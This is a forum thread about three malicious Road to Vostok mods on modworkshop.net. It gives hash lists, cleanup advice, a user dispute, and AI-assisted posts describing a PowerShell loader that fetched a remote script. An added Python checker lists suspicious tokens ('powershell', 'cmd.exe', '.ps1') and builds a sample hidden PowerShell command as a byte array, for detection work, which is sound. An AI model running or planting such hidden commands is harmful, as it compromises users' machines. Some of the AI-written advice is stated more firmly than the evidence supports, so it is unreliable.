If you installed any of the following mods:
- "Auto Save on Exit" by Subaiy. MD5 hash - 6246fa47c492250128cbb4a463d2161a
- "Kill Counter" by Daniel (if you downloaded this one: https://modworkshop.net/mod/56156 you are fine). MD5 hash - bcee56cc847489a2a328189ba882d95e
- "Enemies Drop Better Loot" by Krunker (if you downloaded this one: https://modworkshop.net/mod/56230 you are fine). MD5 hash - ba9e7d88f1079c0324d53bde5786e4da

Your PC is likely infected with malware. Do a proper reset of your computer.
What are we gonna do next?
- We are going to look for moderators to look at new mods for RTV.
- We'll be looking into ways to improve the site itself to better protect against these bad actors and also to let users know if a mod was infected - https://modworkshop.net/thread/13229.
What can you do?
- Again, if you are infected, factory reset your computer.
- Search for suspicious things in the mods you download (like "powershell").
These attacks all follow the same pattern: they execute a PowerShell script using some encoded URL.
- Check the file hash of the file you downloaded using: https://hash-file.online.
- Any mod containing a PowerShell script without a good reason should be reported to moderators.
- Any mod that isn't open-source should be reported.
It was Kill counter by Sukui, not some "Daniel", that's first. Second, you're going after me personally now 'cause I found out that you're copying the work of others without credit. That's that. Malware or not, this is bad actor behaviour as well. BTW, this was your response: "appreciate you letting me know - added the original mod as credit" (and you credited someone else). Now you're acting like a hurt child with narcissistic injury. Go figure.
@wons I'm so glad you can tell the difference! Now can you tell that the mod you recommended also did the same? With the original mod that I credited? How about you get off your high horse if you're not contributing anything <3
I appreciate you guys spotting this and working fast to remove the mods. Sucks to have to reset my whole system but hey, I got Windows 10 back and I'm running faster than ever now. Also lost 200 GB of mysteriously unaccounted for space on my C: Drive. Blessing in disguise I guess!
Is there any way to prevent this kind of thing from continuing to happen? Are mod files scanned before authors upload them?
Generally no, but we have moderators that actively look at mods and reports.
- While in this case VirusTotal couldn't detect anything, you can try scanning it through VirusTotal just in case.
- Search for suspicious things in the code, like "powershell"; there's little reason for mods to run OS.execute.
- Check that the user isn't too new and has a track record of uploading working mods over time. A GitHub repo is usually a sign of a legit user. One of the banned users was an account from 2023, so it's not impossible for them to have dormant accounts on sites.
- Ask around the community if a mod seems sus; AI can also detect fishy code.
In the end if you find a mod is malicious, report it.
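
An added example, not part of the thread or the site's own tooling: a local version of the two checks suggested above and in the announcement, comparing a download's MD5 against the three announced hashes and searching mod source for "powershell" or OS.execute, including when the command is hidden as a list of byte values. The byte-array pattern, the extra tokens and the sample script are assumptions constructed for this example.

```python
import hashlib
import re

# MD5 hashes of the three infected downloads, copied from the announcement.
KNOWN_BAD_MD5 = {
    "6246fa47c492250128cbb4a463d2161a",  # "Auto Save on Exit"
    "bcee56cc847489a2a328189ba882d95e",  # "Kill Counter"
    "ba9e7d88f1079c0324d53bde5786e4da",  # "Enemies Drop Better Loot"
}
# "powershell" and "OS.execute" are named in the thread; the other two
# tokens are assumptions added for this example.
SUSPICIOUS = ("powershell", "os.execute", "cmd.exe", ".ps1")
# Eight or more comma-separated small decimals: text hidden as a byte array.
BYTE_ARRAY = re.compile(r"\b\d{1,3}(?:\s*,\s*\d{1,3}){7,}\b")


def decode_byte_arrays(source):
    """Return the text hidden in each decimal byte array found in source."""
    decoded = []
    for match in BYTE_ARRAY.finditer(source):
        values = [int(v) for v in match.group().split(",")]
        if all(v < 256 for v in values):
            decoded.append(bytes(values).decode("latin-1"))
    return decoded


def scan_source(source):
    """Return suspicious tokens found in plain or byte-array-encoded form."""
    texts = [source] + decode_byte_arrays(source)
    return sorted({t for text in texts for t in SUSPICIOUS if t in text.lower()})


def is_known_bad(data):
    """True if the MD5 of the file content matches an announced hash."""
    return hashlib.md5(data).hexdigest() in KNOWN_BAD_MD5


# Constructed sample (not taken from the real mods): the command is stored as
# a byte array, so a plain search for "powershell" finds nothing.
HIDDEN = "powershell.exe -w Hidden -f placeholder.ps1"
SAMPLE = 'var cmd = [%s]\nOS.execute("cmd.exe", [cmd])' % ",".join(
    str(b) for b in HIDDEN.encode())

if __name__ == "__main__":
    print(scan_source(SAMPLE))            # tokens found, including decoded ones
    print(is_known_bad(SAMPLE.encode()))  # hash check on the sample's bytes
```

A hash match only identifies the exact files already reported; a re-uploaded or slightly changed copy has a different hash, which is why the content scan is run as well.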
@luffy Your explanation was very detailed. If I come across any malicious mods, I’ll make sure to report them. Thank you for your work and dedication.
This message was written with the help of AI.
⚠️ For everyone who already KNOWS this mod is malware – here is what is actually happening and what it means:
If you used the mod, your PC has already:
- Executed a hidden PowerShell command
- Downloaded a remote script from the internet
- Executed that script silently
- Deleted the visible traces afterwards
This means:
👉 You did NOT just run a mod
👉 You allowed external code to run on your system
What is likely happening right now
Depending on what the downloaded script ("da.ps1") contained, your system could currently:
- Have a stealer running (browser passwords, cookies, tokens)
- Have a background connection to a remote server
- Have additional malware installed
- Have persistence (auto-start after reboot)
Even if you see NOTHING:
→ that is completely normal for this type of attack
What this means for you
- Your accounts may already be compromised
- Changing passwords too early = useless (they can be stolen again)
- The infection may still be active in the background
What to do RIGHT NOW (no debate)
- Disconnect from internet
- Run full antivirus scan
- Run offline scan (important)
- Only AFTER that:
- Change passwords
- Enable 2FA
- Log out all sessions
About the mod site
I will personally avoid modworkshop.net for now, as it currently feels unsafe to download from there until this situation is clarified.
Reset or not?
- Full reset = safest option
- No reset = possible, BUT only if you properly clean the system
Final reality check
This is not:
- a bug
- a mistake
- a “harmless mod”
This is:
👉 a loader that executed remote code on your PC
Act accordingly.
This message was written with the help of AI.
⚠️ Update regarding the infected mod (killcounter / Road to Vostok)
I want to give a clear update on what happened on my system and what I did step by step.
What happened
- I ran the mod
- The mod executed hidden code in the background
- It launched PowerShell and downloaded a remote script
- That script was executed silently and then deleted
So yes:
👉 this was confirmed to be a malware loader
What I did immediately
- Disconnected my PC from the internet (LAN unplugged)
- Stopped using the system normally
- Ran a full system scan
- Ran a Windows Defender offline scan (boot-time scan)
Both scans:
👉 0 threats found
Additional checks
I also:
- Generated a full system report (autostart, tasks, processes)
- Manually reviewed everything
Result:
- No suspicious startup entries
- No malicious scheduled tasks
- No unknown background processes
- No persistence mechanisms found
Security actions
After scanning:
- Changed all important passwords (while offline)
- Enabled / verified 2FA
- Logged out of sessions
Current situation
- No signs of active malware
- System appears clean
- No persistence detected
👉 Most likely scenario:
- The downloaded payload either did nothing, failed, or only ran temporarily and did not stay on the system
Important note
Even though my system is clean now:
- Remote code WAS executed
- This is NOT a harmless mod issue
- This was intentionally malicious behavior
My personal conclusion
- I will avoid downloading mods from modworkshop.net for now until this is clarified
- I recommend others to be cautious as well
Final takeaway
If you ran this mod:
- Assume code was executed on your PC
- Scan your system properly
- Secure your accounts
Don’t ignore it just because nothing “seems” wrong.
Stay safe.
Here's hoping.